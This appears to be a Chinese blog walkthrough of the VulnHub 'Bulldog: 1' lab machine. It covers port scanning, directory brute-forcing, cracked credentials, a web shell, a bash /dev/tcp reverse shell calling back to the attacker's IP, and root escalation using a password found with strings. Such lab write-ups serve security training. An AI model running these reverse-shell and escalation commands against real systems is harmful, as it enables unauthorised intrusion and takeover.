• 靶机渗透实战2:Bulldog: 1


    一、准备说明:

    攻击机:WMware 中的 Kali Linux

    靶机:VMware 中的 Bulldog: 1(下载地址:https://www.vulnhub.com/entry/bulldog-1,211/

    目标:Escalate the privileges to root and capture the flag

    二、信息收集

    2.1 端口扫描,服务指纹识别:

    nmap命令:nmap -p 1-65535 -A 192.168.1.104

    23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

    80/tcp open http WSGIServer 0.1 (Python 2.7.12)

    8080/tcp open http WSGIServer 0.1 (Python 2.7.12)

    2.2 DirBuser 爆破目录

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    http://192.168.1.104:80
    --------------------------------
    Directories found during testing:
     
    Dirs found with a 200 response:
     
    /notice/
    /
    /admin/login/
    /dev/
    /dev/shell/
     
    Dirs found with a 302 response:
     
    /admin/
    /admin/logout/
    /admin/auth/
    /admin/auth/user/
    /admin/auth/group/
     
    --------------------------------
    Files found during testing:
     
    Files found with a 200 responce:
     
    /static/js/jquery.min.js
    /static/js/bootstrap.js

    2.3 访问已爆破出来的目录:

    访问:http://192.168.1.104/admin/ 

    访问:http://192.168.1.104/dev/

    查看源码:

    MD5解密:可能对应的账号:

    nick--------bulldog
    sarah-------bulldoglover

     访问:http://192.168.1.104/dev/shell/

     三、漏洞挖掘:

    3.1 登录账户

    用 sarah-------bulldoglover 作为账号密码登录后,刷新 http://192.168.1.104/dev/shell/

    3.2 反弹 shell

    kali攻击机命令:nc -lvnp 6666

    echo "bash -i >& /dev/tcp/192.168.1.102/6666 0>&1" | bash

    3.3 权限提升

    cat /etc/passwd

    bulldogadmin:x:1000:1000:bulldogadmin,,,:/home/bulldogadmin:/bin/bash
    django:x:1001:1001:,,,:/home/django:/bin/bash

     查找bulldogadmin用户的文件: find / -user bulldogadmin 2>/dev/null

     

    发现值得关注的文件有:一个是note,一个是customPermissionApp。

    /home/bulldogadmin/.hiddenadmindirectory/note

    /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp

    strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp

    SUPERultHimatePASHSWORDyouHCANTget 尝试去掉其中的H
    SUPERultimatePASSWORDyouCANTget

    执行命令:python -c 'import pty;pty.spawn("/bin/bash")'

    尝试密码:sudo su -

    提权成功。

     
    博主简介:博主国内安全行业目前最强大的网络安全公司做技术研究员,常年做技术工作。 获得过以下全国竞赛大奖: 《中国电子作品大赛一等奖》 《云计算技术大赛一等奖》 《AIIA人工智能大赛优胜奖》《网络安全知识竞赛一等奖》 《高新技术个人突出贡献奖》,并参与《虚拟化技术-**保密**》一书编写,现已出版。还拥有多项专利,多项软件著作权! 且学习状态上进,立志做技术牛逼的人。座右铭:在路上,永远年轻,永远热泪盈眶。可邮件联系博主共同进步,个人邮箱:pigeon_code@163.com
  • 相关阅读:
    node sql语句占位符用法(防sql注入攻击)
    请求node服务的静态资源请求不到
    node实现图片上传功能
    前端代码静态资源存阿里云
    git代码提交
    vue处理后台返回流的形式的文件下载
    20172305 2018-2019-1 《Java软件结构与数据结构》第五周学习总结
    20172305 2018-2019-1 《Java软件结构与数据结构》第四周学习总结
    20172305 2018-2019-1 《程序设计与数据结构》实验一报告
    20172305 2018-2019-1 《Java软件结构与数据结构》第三周学习总结
  • 原文地址:https://www.cnblogs.com/mutudou/p/14373621.html
Copyright © 2020-2023  润新知